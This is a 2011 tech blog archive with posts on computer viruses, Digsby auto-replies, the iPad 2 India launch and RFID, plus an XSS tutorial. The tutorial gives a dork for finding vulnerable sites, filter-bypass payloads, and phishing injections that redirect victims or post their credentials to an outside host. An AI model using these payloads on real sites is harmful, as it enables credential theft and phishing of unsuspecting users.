Saturday, April 30, 2011

// // Leave a Comment

Computer Virus


Computer Virus

Computer viruses are programs written by "mean" people to achieve some Goal ! A computer virus is a program which reproduces itself. 



What Is a Basically Virus mean?


A computer virus is a destructive computer program written to alter the way a computer operates. A computer virus is a contagious and passes through networked and shared media, such as floppy disk and CD-ROMs and Pen Drives!!

A virus is a program written by individual who take pleasure in causing damage to computers and the data stored in them. Upon infecting a computer, viruses copy
Malicious program code into files and multiply rapidly in size. They
are capable of renaming files in a computer so that the programs no longer run. They
can also overwrite, corrupt, or delete files in a computer, rendering a computer useless.

Some viruses are programmed or written only to damage systems files and even format the hard disk.

A virus, if detected can cause serious damage to data on the computer. If the computer is on network, the virus will infect other computers. Sometimes, data on the infected computers is lost and cannot be retrieved. For companies dependent on the data,
this can even lead to serious financial loss. Some examples of such viruses are Disk Killer, W97M, Cascade, Autorun, Anna Kournikova and Lovegate


How Virus is spread?


The Virus begin to work and spread when you start up the program or application of which the virus is present . The virus may be programmed to attach to other applications, disks or folders. It may infect a network if given the opportunity


Antivirus Software


Its is nothing but the software which is designed to protect your System against Virus You can protect your hard disk from a virus attack by using antivirus software. Antivirus
software is software that scans the computer’s hard disk to detect viruses. If any virus is around software removes it from computer. A number of antivirus program are available in the market. Some of them are:

• McAfee
• Quick Heal
• Smart dog


Why Antivirus Software is Required to Update?


New viruses are created every day, which multiply through the internet and infected
networks. Therefore, you need you update your antivirus software on a regular basis.


How To Prevent your System from Virus Attack?


Here are some precautions that you can follow to keep your computer free from viruses:

* Scan all floppy disk before copying or opening files.

* Install at least one antivirus program on your computer and use it regularly to check for
   viruses.

* Update your antivirus program regularly to protect your computer from new viruses.

* Make backup copies of important files regularly, so that the damage is minimized if a    
virus attack does occur.


As every new breed of virus is conceived, created and released into the wild, another small change is made to the anti-virus software to combat the new threat


Author : Pratik Nikam
Thanks :)



Read More

Thursday, April 28, 2011

// // Leave a Comment

How to Set Auto-response for Facebook,Gmail,Yahoo etc . .


There are lots of Messengers available , my favourite one is Digsby . My many friends have asked me that how do they get Auto Response when they send some IM ! So here is the Solution for it !

Firstly you will need to download Digsby Software . It s IM software which allows you to login to various accounts like Gtalk, Yahoo , Facebook , AIM , Live , Twitter , MySpace etc . .

Here is the Download link for Digsby :  Download Digsby

Now just Follow Steps :-

1) Open Digsby

If you are already Digsby member then directly jump to step 5

2) Now you will have to create 1 Digsby Account which you will use for Digsby.
3) Now Go to  Digsby >> My Accounts  . . Here add your account (FB,Gmail,Yahoo) username and passwords and say "Save"
4) Now your User Names are Paswords are with Digsby , so you will not need to enter it everytime . What you will need is just Digsby acount Username & Password

5) Now go to Digsby >> My Status >> " Away "



6) Now change "Away" with whatever you want !



7) Go to Tools >> Preferences >> Status >> Tick on " Auto-Response with Status Message "
  
8) Now autoresponse will be activated

9) If any one sends you IM then it will look like this ( i am showing you for FB , same is the case with others )



I hope you like it :)

Thanks :)
Read More
// // Leave a Comment

Tomorrow Apple iPad 2 coming to India

Yes Friends , you heard it right !!  Here is the good news if you are apple Lover . .  Apple has officially announced through the press release that it will launch the much awaited iPad 2 in India on April 29 . Along with India, Apple is also releasing iPad 2 in Hong Kong, Israel, Korea, Macau, Malaysia, Philippines, Singapore, South Africa, Turkey, UAE. China will get only the Wifi version on April 28






The iPad 2 prices in India are as follows 

Wi-Fi 16GB             Rs.29,500
Wi-Fi 32 GB           Rs. 34,500
Wi-Fi 64 GB           Rs. 39,500
Wi-Fi+3G 16 GB   Rs. 36,900
Wi-Fi+3G 32 GB   Rs. 41,900
Wi-Fi+3G 64 GB   Rs. 46,900

Anyways, are you buying an iPad?


Do you think iPad launch will hurt Samsung Galaxy Tab’s sale in India? What about Notion Ink’s Adam?
Thanks :)


Read More

Wednesday, April 27, 2011

// // Leave a Comment

RFID ( Radio Frequency Identification )


RADIO FREQUENCY IDENTIFICATION



 INTRODUCTION

 RFID (Radio Frequency IDentification)is a technology that incorporates the use of electromagnetic or electrostatic coupling in the radio frequency (RF) portion of the electromagnetic spectrum to uniquely identify an object, animal, or a person. It is an automatic identification method, relying on storing and remotely retrieving data whenever required using devices called RFID Tags or transponders.

Definition :-

RFID is a convenient and popular term for a technology with vague boundaries and many facets. Radio-frequency identification is not always based on radio-frequency communications and identification is only one among the many functions RFID technology can perform. Rather, RFID enables data collection with contactless electronic tags and wireless transmitters (readers) for identification and other purposes.

Concept :-

RFID uses a semiconductor (micro-chip) in a tag or label to transmit stored data when the tag or label is exposed to radio waves of the correct frequency


HISTORY


Radio frequency identification has been around for decades. Learn how it evolved from its roots in World War II radar systems to today's hottest supply chain technology.It’s generally said that the roots of radio frequency identification technology can be traced back to World War II. The Germans, Japanese, Americans and British were all using radar—which had been discovered in 1935 by Scottish physicist Sir Robert Alexander Watson-Watt—to warn of approaching planes while they were still miles away. The problem was there was no way to identify which planes belonged to the enemy and which were a country’s own pilots returning from a mission.

The Germans discovered that if pilots rolled their planes as they returned to base, it would change the radio signal reflected back. This crude method alerted the radar crew on the ground that these were German planes and not Allied aircraft (this is, essentially, the first passive RFID system).


COMPONENTS OF RFID SYSTEM




THE TAG


There are two main components present in the RFID tag. Firstly, a small silicon chip or integrated circuit which contains a unique identification number (ID). Secondly, an antenna that can send and receive radio waves. These two components can be tiny: the antenna consists of a flat, metallic conductive coil rather than a protruding FM-style aerial (see figure 1), and the chip is potentially less than half a millimetre (Hitachi, 2006).These tags can be quite small, thin and, increasingly, easily embedded within packaging, plastic cards, tickets, clothing labels, pallets and books. There are two main types of tags: passive and active. RFID Tag is a transponder which receives a radio signal and in response to it, sends out a radio signal. Tag contains an antenna, and a small chip that stores a small amount of data. Tag memory can be factory or field programmed, partition able, and optionally permanently locked. 


TYPES OF TAG

Active Tags :-

Active RFID Tags are powered by an internal battery and are typically read/write, i.e., Tag data can be rewritten and/or modified. An Active Tag's memory size varies according to application requirements; some systems operate with up to 1MB of memory. In a typical read/write RFID work-in-process system, a Tag might give a machine a set of instructions, and the machine would then report its performance to the Tag. The battery-supplied power of an Active Tag generally gives it a longer read range. The trade off is greater size, greater cost, and a limited operational life . 

Passive Tags :-

Passive RFID Tags operate without a separate external power source and obtain operating power generated from the reader. Passive Tags are consequently much lighter than Active Tags, less expensive, and offer a virtually unlimited operational lifetime. The trade off is that they have shorter read ranges than Active Tags and require a higher-powered reader. Read-only Tags are typically passive and are programmed with a unique set of data (usually 32 to 128 bits) that cannot be modified. Read- only Tags most often operate as a license plate into a database, in the same way as linear barcodes reference a database containing modifiable product-specific information. 



THE READER


The reader is a handheld or fixed unit that can interrogate nearby RFID tags and obtain their ID numbers using radio frequency (RF) communication (i.e. the process does not require contact). When a passive tag is within range of a reader, the tag’s antenna absorbs the energy being emitted from the reader, directs the energy to ‘fire up’ the integrated circuit on the tag, which then uses the energy to beam back the ID number and any other associated information. There are two main classes of RFID readers: read-only, an example being those that operate with the purely passive EPC Class 1 tags, and read/write, which can write new information back to a tag that has been equipped with a read/write memory. 

The readers are becoming increasingly sophisticated, acting as gateways into the network-centric communication systems of modern enterprises by supporting communication protocols such as TCP/IP and network technologies such as DHCP, UDP/IP and Ethernet or 802.11x (for wirelessly sending data back to the enterprise). Many models of reader are handheld devices and resemble the pricing guns or barcode scanners used in supermarkets, but readers can also be fixed in place (e.g. in doorways or at vehicle toll gateways) and even hidden, e.g. embedded into ceilings or walls. 

There are also readers that can be incorporated into handheld devices such as PDAs and mobile phones (e.g. Nokia 5140, Nokia 3220 – see figure 2) and, in addition, class 5 tags are also known as 'reader' tags–devices that can read other RFID tags and exchange data with them


FREQUENCIES USED



ADVANTAGES AND DISADVANTAGES


ADVANTAGES :- 

RFID tags are very simple to install/inject inside the body of animals, thus helping to keep a track on them. This is useful in animal husbandry and on poultry farms. The installed RFID tags give information about the age, vaccinations and health of the animals.
RFID technology is better than bar codes as it cannot be easily replicated and therefore, it increases the security of the product.
Supply chain management forms the major part of retail business and RFID systems play a key role by managing updates of stocks, transportation and logistics of the product.
Bar-code scanners have repeatedly failed in providing security to gems and jeweleries in shops. But nowadays, RFID tags are placed inside jewelry items and an alarm is installed at the exit doors.
The RFID tags can store data up to 2 KB whereas, the bar code has the ability to read just 10-12 digits.


DISADVANTAGES :-

The RFID technology, though very beneficial, is expensive to install. Small and medium scale enterprises find it costly to use it in their firms and offices.

It is difficult for an RFID reader to read the information in case of RFID tags installed in liquids and metal products. The problem is that the liquid and metal surfaces tend to reflect the radio waves, which makes the tags unreadable. The tags have to be placed in various alignments and angles for taking proper reading. This is a tedious task when the work involves big firms.
Interference has been observed if devices such as forklifts and walkie-talkies are in the vicinity of the distribution centers. The presence of mobile phone towers has been found to interfere with RFID radio waves. Wal-Mart, the retail sector giant, has installed billions of RFID tags in their products throughout the world and they have encountered such problems.
RFID technology has been referred to as invasive technology. Consumers are apprehensive about their privacy when they purchase products with RFID tags. Once the radio chips are installed in the product, the customer can be tracked and his personal information can be collected by the RFID reader. However, many stores have a facility that deactivates the RFID tags after the product has been purchased.


APPLICATIONS


Asset Tracking: Static or in-motion assets tracking or locating, like a healthcare facility, wheelchairs or IV pumps in, laptops in a corporation and servers in a data center, was not so easy task.User can instantly determine the general location of tagged assets anywhere within the facility with the help of active RFID technology. 

People Tracking:People tracking system are used just as asset tracking system. Hospitals and jails are most general tracking required places.Hospital uses RFID tags for tracking their special patients. In emergency patient and other essential equipment can easily track. It will be mainly very useful in mental care hospitals where doctors can track each and every activity of the patient.

Document tracking:This is most common problem. Availability of large amount of data and documents brings lots of problem in document management system. 

Government Library:Many government libraries use barcode and electromagnetic strips to track various assets. RFID technology uses for reading these barcodes unlike the self-barcode reader RFID powered barcode reader can read multiple items simultaneously.


FUTURE SCOPE


Many people in the industry are of the opinion that RFID is the frontrunner technology for automatic data collection and identification. One of the main benefits, which is still unproven, would be in the supply chain of consumer goods, wherein an RFID tag attached to a product would enable it to be tracked right from the point of manufacture to the retail store and then to a customer’s home. 
In fact, the RFID software market is poised for taking off in a big way.

Many people in the field think that RFID technology is still in its infancy with its potential still untapped. While there is speculation about the amazingly varied ways this technology can be used, unless there are more standards put in place within the industry and until there is a reduction in the cost of RFID technology, it is unlikely that this technology will reach its full potential in the near future. 


CONCLUSION


RFID technology can be the next tool for success and management of various businesses. With more research, the flaws and limitations of this technology can be removed. This will make RFID technology very useful for diverse sectors like retail, transport and jewelry businesses.



Author : Miss.Sampada
Thanks :)



Read More

Tuesday, April 26, 2011

// // 1 comment

Cross Site Scripting




Introduction


XSS is also termed as CSS; no it’s not Cascading Style Sheet. Its is abbreviation for Cross Site Scripting. From the title itself it is clear that XSS is related to scripts to be precise it’s JavaScript. XSS is very common type of attack found in web-world which allows attacker to inject his malicious script; also attacker can inject his malicious script into website. When normal user like us run that script in his browser then that script or code will get executed.
  

Types of XSS


Basically there are three types of Cross Site Scripting.

1) Local XSS
2) Persistent XSS
3) Non-Persistent XSS

Now we will go through each type 


Local Cross Site Scripting:-
This one is one of the basic types of XSS attack.  Local XSS attacks are the rarest types of attack found!  This requires Exploits for Browser vulnerability … Using this attack the hacker can install spam bots, Different worms and also Backdoors on your Computer.

Non-Persistent Cross Site Scripting:-
This is the very common types of attack which generally don’t harm the websites. . That means they don’t steal cookies or anything. . This attack is possible using the crafted link created by Hacker and get activated when user Visits such links.

Persistent Cross Site Scripting :-
This is the attack which can be used steal the Website cookies. The Browser uses cookies to store Users personal information so that you stayed logged in even after you leave, Cookies are also use for storing users Authentication information

One can spread worms using Persistent XSS and he can also use it to deface the websites. This attacks are usually use in online forums, search engines, blog’s and search engines.


  
How to find XSS Vulnerable Website


Finding the XSS vulnerable website is not a big deal! What you need is just a Brain! 
So for finding the XSS vulnerable website we will take the help of Google Dorks. Using this work will get simpler. We will first see what Google Dork is!
Google dork is nothing but searching on Google in advance, it is used by many Bloggers, webmasters! 
We will use the following dork for finding XSS vulnerable website 
inurl:"search.php?q="
First we will see how above Dork will work :- 
“inurl” is used to find the “search.php” file in website URL . So after searching this you will get all the websites which contains search.php page in it , that is what we want !
What you need to do is just copy paste above dork in Google search Engine.



How to Execute XSS Commands


Using Google Dork when you will find website containing search field . In that search field try to execute following simple JavaScript.  

<script>alert("xyz");</script>

<script> : The script tag is used to define the client side script. It may contain scripting elements.
alert : Its is a function to pop-up a dialog box , it is nothing but a simple window containing a message in double quotes
</script> : Its is use for end of Script
Just copy paste above script in search field and press enter , you will see pop up box containing “xyz”
You can use any word instead of “xyz”! You can also replace “ “ by ‘ ‘.

Let us take an example 
<script>alert(‘xyz');</script>
I am using “xyz” for this Tutorial 
After pressing window the pop up will come if the target website is Vulnerable !
                                        |~~~~~~~|    |~~~~~~~|
                                        |     | xyz | or | 1234 |     |
                                        |~~~~~~~|    |~~~~~~~|

Instead of above code we can also inject a code like - 
<h1><font color="#00AB00">My name is xyz </font></h1>

You can also use this code - 
www.mysite.in/google.php?search=<h1><font color="#00FF00">
My name is xyz</font></h1>
In above code what we are doing extra is we are setting font color of text “ My name is xyz “ 
Whatever we are seeing is totally client side. Attacker determines the content of website! 
If the above simple techniques are not working then don’t worry ! there is solution for every problem. That means the website uses the filter techniques to avoid the XSS attack. We will see what are the Bypass Techniques available in Next chapter.


Bypass Techniques


Basically there are three techniques available to bypass the filter , we will go through each .
Techniques Available:-
1) HEX Encoding
2) Obfuscation
3) Magic_Quotes_gpc=ON

HEX Encoding 
This is very useful bypass trick. Using this method your script will get encrypt in hex format and we will execute it .
This is how 
<script>alert(“Tutorial”);</script>
Looks like encrypted in HEX:
www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
We have just converted our script in hex format.
  
Obfuscation
In web world there is one term called as “Bad wordlist “. That means if you search for any word that is present in this list then it will give you error like “You are not allow to search this word “
So what developers do is, they just put words like “alert”, “script” in this list !
But this is very weak protection! We can bypass us using obfuscation your code script like 
<SCripT>alert ('Tutorial');</ScRipt>
From above example as we can see that there are lots of possibilities!! 

Magic_Quotes_gpc=ON
This is php setting available. It causes that every every " (double quote)  , ' (single-quote) and  \ (backslash) are escaped with a Backslash automatically
Now How to bypass it when it's ON? – We will use the JavaScript  function called String.fromCharCode(), to convert your text in decimal characters and put them in the handling. Using "rat” will look like this:
String.fromCharCode(114, 97,116)
We have converted every character into its decimal form. 
Now insert this in your alert script:
www.site.ru/google.php?search=<script>alert(String.fromCharCode(117, 114, 116, 108));</script>


Use can use following link for conversion of character to decimal form. 
http://www.asciizeichen.de/tabelle.html


  
Simple XSS attack


Now we will see very simple XSS attack. Open any website having Search field in it!
Enter the below script into search box and press enter. 
<script>alert(“Hello World”);</script>
If the site is vulnerable to XSS attack then it will look like this  



This is how the the pop up will look after executing script.




What can we do with XSS ?


Till now we have seen very simple xss attack. Now we will see how harmful such xss attacks can be for your Website!
Here are some attack techniques you can do with XSS :-

1) Iframe Phishing
2) Cookie stealing    
3) Inject a Phishing script
4) Redirect Phishing

Iframe Phishing :-
Just inject a JavaScript code containing iframe where your phishing site is embedded. This should look like a target site !
Ex.
www.anysite.in/google.php?search=<iframe src="http://www.phishingsite.in" height="100%" width="100%"></iframe>

Trick : height="100%" width="100%" means that the whole window is filled with that iframe. And www.phishingsite.in is the path where our phishing script is present
The target site will spawn your phishing site in an Iframe, and the website  victims won't see a difference and log in.

Cookie Stealing:-
Firstly we will see what cookies are.
A cookie is a piece of text stored on user’s computer by their web browser. It can be used for storing session information, site preferences and for authentication process. There are two copies of cookies, one is stored at browser and another is present at server. Cookies may be set with or without expiration date.
Cookie stealing is one of the major flaws in XSS. Here what attacker will do is , he will just send you one JavaScript and he will tell you to execute that script in your browser. After executing that script he will get all your Cookies!
Now we will see how he did it!
Basically he is having two php scripts! First one is fetch.php and second is access.php
fetch.php – This script is use to steal the users cookies!
access.php – This script is use to access that stolen cookies!
When he get your cookies, with the help of that he will be able to login to your account without Password!! Strange right ? so please never visit any anonymous links !

Inject a Phishing script :-
You can inject a user and password field in html with the help of <html> and <body> tags!

Attacker will create fake login page using html tags.Victim will think that he needs to login so he will enter his username and password over there and the attacker will get all the information !
Ex.
www.anysite.in/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head> <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.in "> Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br /> <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" /> <br/></form></div></body></html>

Redirect Phishing:-
In this attack just inject a JavaScript redirection script that leads to your
phishing site,  it needs to look just like the target site.
Ex.
www.site.ru/google.php?search=<script>document.location.href="http://www.phishingsite.in"</script>

How to Fix XSS Holes?

 You can secure your website from XSS attack using fowling functions.
1) htmlspecialchars ()
Here the htmlspecialchars() function converts some predefined characters to HTML entities.
The predefined characters are:
  • &(ampersand) becomes &amp;
  • '  (single quote) becomes &#039;
  • " (double quote) becomes &quot;
  • > (greater than) becomes &gt;
  • < (less than) becomes &lt;

2) htmlentities ()

This function converts characters to HTML entities.
This function is identical to htmlspecialchars () in all ways, except with
htmlentities (), all characters which have HTML character entity
Equivalents are translated into these entities

Conclusion

Lack of security is not a matter of resources

The conclusion which can be made out of this is that the large corporations or websites are getting hacked in exactly same way as that of small budget business websites are getting hacked so Lack of security is not a matter of resource but there is lack of awareness among people ! So Be Alert!! 


Author : Pratik Nikam
Thanks :)
Read More